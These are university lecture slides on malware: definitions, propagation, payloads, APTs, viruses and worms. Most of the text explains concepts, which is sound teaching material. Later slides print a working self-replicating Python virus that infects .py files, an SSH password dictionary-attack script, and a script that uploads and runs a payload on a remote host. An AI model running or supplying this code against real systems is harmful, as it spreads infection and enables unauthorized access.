Understanding Malware: Types, Behavior, and Defense Strategies

Malicious Software (Malware) Chien-Chung Shen cshen@udel.edu

Malware NIST defines malware as: a program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim s data, applications, or operating system or otherwise annoying or disrupting the victim

Classification of Malware Classified into two broad categories based first on how it spreads or propagates to reach desired targets then on the actions it performs once a target is reached Also classified by those that need a host program (parasitic code such as viruses) those that are independent, self-contained programs (worms, trojans, and bots) malware that does not replicate (trojans and spam e-mail) malware that does replicate (viruses and worms)

Propagation Mechanisms Infection of existing content by viruses that is subsequently spread to other systems Exploit of software vulnerabilities by worms or drive-by-downloads to allow the malware to replicate Downloads which a person authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet). Any download that happens without a person's knowledge, often a virus, spyware, malware, or crimeware Social engineering attacks that convince users to bypass security mechanisms to install Trojans or to respond to phishing attacks

Payload Actions Corruption of system or data files Theft of service/make the system a zombie agent of attack as part of a botnet Theft of information from the system/keylogging Stealthing/hiding its presence on the system

Attack Kits Initially, development and deployment of malware required considerable technical skill by software authors development of virus-creation toolkits in the early 1990s and then more general attack kits in the 2000s greatly assisted in the development and deployment of malware Toolkits are often known as crimeware include a variety of propagation mechanisms and payload modules that even novices can deploy variants that can be generated by attackers using these toolkits creates a significant problem for those defending systems against them Widely used toolkits include: Zeus Blackhole Sakura Phoenix

Attack Sources Another significant malware development is the change from attackers being individuals often motivated to demonstrate their technical competence to their peers to more organized and dangerous attack sources such as: Politically motivated attackers Criminals Organized crime Organizations that sell their services to companies and nations National government agencies This has significantly changed the resources available and motivation behind the rise of malware and has led to development of a large underground economy involving the sale of attack kits, access to compromised hosts, and to stolen information

Advanced Persistent Threats (APTs) Well-resourced, persistent application of a wide variety of intrusion technologies and malware to selected targets (usually business or political) Typically attributed to criminal enterprises Differ from other types of attack by their careful target selection and stealthy intrusion efforts over extended periods High profile attacks include Aurora, RSA, APT1, and Stuxnet

Characteristics of APT Advanced Used by the attackers of a wide variety of intrusion technologies and malware including the development of custom malware if required The individual components may not necessarily be technically advanced but are carefully selected to suit the chosen target Persistent Determined application of the attacks over an extended period against the chosen target in order to maximize the chance of success A variety of attacks may be progressively applied until the target is compromised Threat Threats to the selected targets as a result of the organized, capable, and well-funded attackers intent to compromise the specifically chosen targets The active involvement of people in the process greatly raises the threat level from that due to automated attacks tools, and also the likelihood of successful attacks

APT Attacks Aim: Varies from theft of intellectual property or security and infrastructure related data to the physical disruption of infrastructure Techniques used: Social engineering Spear-phishing email Drive-by-downloads from selected compromised websites likely to be visited by personnel in the target organization Intent: To infect the target with sophisticated malware with multiple propagation mechanisms and payloads Once they have gained initial access to systems in the target organization a further range of attack tools are used to maintain and extend their access

Viruses Piece of software that infects programs Modifies them to include a copy of the virus Replicates and goes on to infect other content Easily spread through network environments When attached to an executable program, a virus can do anything that the program is permitted to do Executes secretly when the host program is run Specific to operating system and hardware Takes advantage of their details and weaknesses

Virus Components Infection mechanism Means by which a virus spreads or propagates Also referred to as the infection vector Payload What the virus does (besides spreading) May involve damage or benign but noticeable activity Trigger Event or condition that determines when the payload is activated or delivered Sometimes known as a logic bomb

Lifetime of Virus Dormant phase Virus is idle; will eventually be activated by some event Propagation phase Virus place a copy of itself into other program or into certain system areas of disk The copy may not be identical to the propagating version; virus often morph to evade detection Each infected program will now contain a clone of the virus which will itself enter propagation phase Triggering phase Virus is activated to perform the function for which it was intended Execution phase The function is performed

Virus Logic program V 1234567; procedure attach-to-program; begin repeat file := get-random-program; until first-program-line 1234567; prepend V to file; end; procedure execute-payload; begin (* perform payload actions *) end; procedure trigger-condition; begin (* return true if trigger condition is true *) end; begin (* main action block *) attach-to-program; if trigger-condition then execute-payload; goto main; end; (a) A simple virus program CV 1234567; procedure attach-to-program; begin repeat file := get-random-program; until first-program-line 1234567; compress file; (* t1 *) prepend CV to file; (* t2 *) end; begin (* main action block *) attach-to-program; uncompress rest of this file into tempfile; (* t3 *) execute tempfile; (* t4 *) end; (b) A compression virus Figure 6.1 Example Virus Logic

Viruses A computer virus is a malicious piece of executable code that propagates typically by attaching itself to a host document that will generally be an executable file Typical hosts for computer viruses are Executable files (such as .exe files in Windows) that may be sent around as email attachments Boot sectors of disk partitions Script files for system administration (such as batch files in Windows, shell script files in Unix, etc.) Documents that are allowed to contain macros (such as Word documents, Excel spreadsheets, Access database files, etc.) Any operating system that allows third-party programs to run can support viruses

Viruses Because of the way permissions work in Unix/Linux, it is more difficult for a virus to wreak havoc in such machines. Let s say that a virus embedded itself into one of your script files. The virus code will execute only with the permissions that are assigned to you. For example, if you do not have the permission to read or modify a certain system file, the virus code will, in general, be constrained by the same restriction Windows also have a multi-level organization of permissions. For example, you can be an administrator with all possible privileges or you can be just a user with more limited privileges. But it is fairly common for the owners of Windows to leave them running in the administrator mode. That is, most owners of Windows will have only one account on their machines and that will be the account with administrator privileges. However, this does not happen in Unix/Linux

Viruses At the least, a virus will duplicate itself when it attaches itself to another host document, that is, to another executable file. But the important thing to note is that this copy does not have to be an exact replica of itself. In order to make more difficult the detection by pattern matching, the virus may alter itself when it propagates from host to host. In most cases, the changes made to the viral code are simple, such as rearrangement of the order independent instructions, etc. Viruses that are capable of changing themselves are called mutating viruses Computer viruses need to know if a potential host is already infected, since otherwise the size of an infected file could grow without bounds through repeated infection. Viruses typically place a signature (such as a string that is an impossible date) at a specific location in the file for this purpose

Viruses Most commonly, the execution of a particular instance of a virus (in a specific host file) will come to an end when the host file has finished execution. However, it is possible for a more vicious virus to create a continuously running program in the background To escape detection, the more sophisticated viruses encrypt themselves with keys that change with each infection. What stays constant in such viruses is the decryption routine The payload part of a virus is that portion of the code that is not related to propagation or concealment

Virus in Python (1) #!/usr/bin/python import os import datetime SIGNATURE = "CRANKLIN PYTHON VIRUS" def search(path): filestoinfect = [] filelist = os.listdir(path) for fname in filelist: if os.path.isdir(path+"/"+fname): filestoinfect.extend(search(path+"/"+fname)) # recursive elif fname[-3:] == ".py": infected = False for line in open(path+"/"+fname): if SIGNATURE in line: infected = True break if infected == False: filestoinfect.append(path+"/"+fname) return filestoinfect

Virus in Python (2) def infect(filestoinfect): virus = open(os.path.abspath(__file__)) # name of myself virusstring = "" for i,line in enumerate(virus): if i>=0 and i <39: virusstring += line virus.close for fname in filestoinfect: f = open(fname) temp = f.read() f.close() f = open(fname,"w") f.write(virusstring + temp) f.close() def bomb(): if datetime.datetime.now().month == 1 and datetime.datetime.now().day == 25: print "HAPPY BIRTHDAY CRANKLIN!" filestoinfect = search(os.path.abspath("")) infect(filestoinfect) bomb() # absolute path of CWD

Worms The main difference between virus and worm is that worm does not need a host document, i.e., a worm does not need to attach itself to another program. In that sense, a worm is self-contained and autonomous On its own (being autonomous), a worm is able to send copies of itself to other machines over a network Therefore, whereas worm can harm network and consume network bandwidth, the damage caused by virus is mostly local to machine Note that a lot of people use terms virus and worm synonymously. That is particularly the case with vendors of anti-virus software. A commercial anti-virus program is supposed to catch both viruses and worms

Mechanisms of Worms Since, by definition, a worm is supposed to hop from machine to machine on its own, it needs to come equipped with considerable networking support With regard to autonomous network hopping, worms may hop from one machine to another by a variety of means By using remote shell facilities, as provided by, say, ssh, rsh, rexec, etc., in Unix, to execute a command on the remote machine. If the target machine can be compromised in this manner, the intruder could install a small bootstrap program on the target machine that could bring in the rest of the malicious software By cracking passwords and logging in as a regular user on a remote machine. Password crackers can take advantage of people s tendency to keep their passwords as simple as possible By using buffer overflow vulnerabilities in networking software In networking with sockets, communication is initiated with client socket sending request for connection to server socket that is constantly listening for such requests. If the server socket code is vulnerable to buffer overflow or other stack corruption, attacker could manipulate that into the execution of certain system functions on server machine that would allow attacker s code to be downloaded into the server machine

Damages by Worms In all cases, the extent of harm that worm can carry out would depend on the privileges accorded to the guise under which the worm programs are executing. So if worm manages to guess someone s password on a remote machine (and that someone does not have superuser privileges), the extent of harm done might be minimal Nevertheless, even when no local harm is done, propagating worm can bog down a network and, if the propagation is fast enough, can cause a shutdown of the machines on the network. This can happen particularly when the worm is not smart enough to keep a machine from getting reinfected repeatedly and simultaneously. (Machines can only support a certain maximum number of processes running simultaneously) Thus, even harmless worms can cause a lot of harm by bringing a network down to its knees

Worm in Python import paramiko import sys def AttackSSH(ipAddress, dictionaryFile) : print "[+] Attacking Host : %s " %ipAddress ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) for line in open(dictionaryFile, "r").readlines() : [username, password] = line.strip().split() try : print "[+] Trying to break in with username: %s password: %s " % (username, password) ssh.connect(ipAddress, username=username, password=password) except paramiko.AuthenticationException: print "[-] Failed! ... continue print "[+] Success ... username: %s and passoword %s is VALID! " % (username, password) break if __name__ == "__main__" : AttackSSH(sys.argv[1], sys.argv[2]) # SSHDictionaryAttack.py $ py SSHDictionaryAttack.py 192.168.1.5 dictionary

Worm in Python import paramiko # UploadAndExecute.py import sys import os # Payload.py os.mkdir( /tmp/hacked ) def UploadFileAndExecute(sshConnection, fileName) : sftpClient = ssh.open_sftp() sftpClient.put(fileName, "/tmp/" +fileName) ssh.exec_command("chmod a+x /tmp/" +fileName) ssh.exec_command("nohup /tmp/" +fileName+ " &") if __name__ == "__main__" : ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(sys.argv[1], username=sys.argv[2], password=sys.argv[3]) UploadFileAndExecute(ssh, sys.argv[4]) ssh.close() $ py UploadAndExecute.py 192.168.1.5 cshen 1234vm Payload.py